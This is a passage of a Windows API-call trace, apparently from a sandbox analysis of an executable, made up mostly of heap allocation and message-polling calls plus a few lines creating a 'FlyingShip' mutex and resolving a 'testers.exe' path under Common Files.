Flags=0x0, Size=0x4) returned 0xc95e00 [0265.935] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc994f0 | out: hHeap=0xb80000) returned 1 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ef28 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc994f0 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99508 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e10 [0265.935] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99508 | out: hHeap=0xb80000) returned 1 [0265.935] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e10 | out: hHeap=0xb80000) returned 1 [0265.935] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a0a8 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99508 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e10 [0265.935] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99508 | out: hHeap=0xb80000) returned 1 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ef60 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99508 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99520 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e20 [0265.935] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99520 | out: hHeap=0xb80000) returned 1 [0265.935] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e20 | out: hHeap=0xb80000) returned 1 [0265.935] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a0d0 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99520 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e20 [0265.935] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99520 | out: hHeap=0xb80000) returned 1 [0265.935] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xc23920 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99520 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99538 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e30 [0265.936] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99538 | out: hHeap=0xb80000) returned 1 [0265.936] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e30 | out: hHeap=0xb80000) returned 1 [0265.936] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a0f8 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99538 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e30 [0265.936] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99538 | out: hHeap=0xb80000) returned 1 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ef98 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99538 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99550 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e40 [0265.936] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99550 | out: hHeap=0xb80000) returned 1 [0265.936] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e40 | out: hHeap=0xb80000) returned 1 [0265.936] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a120 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99550 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e40 [0265.936] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99550 | out: hHeap=0xb80000) returned 1 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9efd0 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99550 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99568 [0265.936] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e50 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99568 | out: hHeap=0xb80000) returned 1 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e50 | out: hHeap=0xb80000) returned 1 [0265.937] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a148 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99568 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e50 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99568 | out: hHeap=0xb80000) returned 1 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9f008 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99568 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99580 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e60 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99580 | out: hHeap=0xb80000) returned 1 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e60 | out: hHeap=0xb80000) returned 1 [0265.937] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a170 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99580 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e60 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99580 | out: hHeap=0xb80000) returned 1 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xbbae98 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99580 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99598 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e70 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99598 | out: hHeap=0xb80000) returned 1 [0265.937] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e70 | out: hHeap=0xb80000) returned 1 [0265.937] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.937] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a198 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99598 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e70 [0265.938] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99598 | out: hHeap=0xb80000) returned 1 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xbbaee0 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99598 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995b0 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e80 [0265.938] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995b0 | out: hHeap=0xb80000) returned 1 [0265.938] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e80 | out: hHeap=0xb80000) returned 1 [0265.938] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a1c0 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995b0 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e80 [0265.938] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995b0 | out: hHeap=0xb80000) returned 1 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xbbaf28 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995b0 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995c8 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95e90 [0265.938] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995c8 | out: hHeap=0xb80000) returned 1 [0265.938] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95e90 | out: hHeap=0xb80000) returned 1 [0265.938] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a1e8 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995c8 [0265.938] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95e90 [0265.938] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995c8 | out: hHeap=0xb80000) returned 1 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xbbaf70 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995c8 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995e0 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95ea0 [0265.939] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995e0 | out: hHeap=0xb80000) returned 1 [0265.939] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95ea0 | out: hHeap=0xb80000) returned 1 [0265.939] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a210 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995e0 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95ea0 [0265.939] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995e0 | out: hHeap=0xb80000) returned 1 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9f040 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995e0 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995f8 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95eb0 [0265.939] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995f8 | out: hHeap=0xb80000) returned 1 [0265.939] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95eb0 | out: hHeap=0xb80000) returned 1 [0265.939] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a238 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995f8 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95eb0 [0265.939] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc995f8 | out: hHeap=0xb80000) returned 1 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xc03728 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc995f8 [0265.939] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99610 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95ec0 [0265.940] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99610 | out: hHeap=0xb80000) returned 1 [0265.940] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95ec0 | out: hHeap=0xb80000) returned 1 [0265.940] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a260 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99610 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95ec0 [0265.940] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99610 | out: hHeap=0xb80000) returned 1 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xbbafb8 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99610 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99628 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xc95ed0 [0265.940] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99628 | out: hHeap=0xb80000) returned 1 [0265.940] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95ed0 | out: hHeap=0xb80000) returned 1 [0265.940] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc8a288 [0265.940] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99628 [0265.941] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0265.941] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="FlyingShip") returned 0x114 [0265.943] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0265.945] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x74f584, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0265.946] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x74f584, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0265.947] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x74f584, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0265.947] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x74f584, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0265.948] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x74f584, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0265.948] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x74f584, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0266.630] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75eb78) returned 1 [0266.631] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc64d8 | out: hHeap=0xb80000) returned 1 [0266.631] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.631] KillTimer (hWnd=0x60172, uIDEvent=0x1) returned 1 [0266.631] SetTimer (hWnd=0x60172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.632] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.632] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.633] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.633] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d90 | out: hHeap=0xb80000) returned 1 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] PeekMessageW (in: lpMsg=0x75f4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f4dc) returned 0 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b88 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b98 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b98 | out: hHeap=0xb80000) returned 1 [0266.634] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d90 [0266.634] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b88 | out: hHeap=0xb80000) returned 1 [0266.634] HeapFree (in: 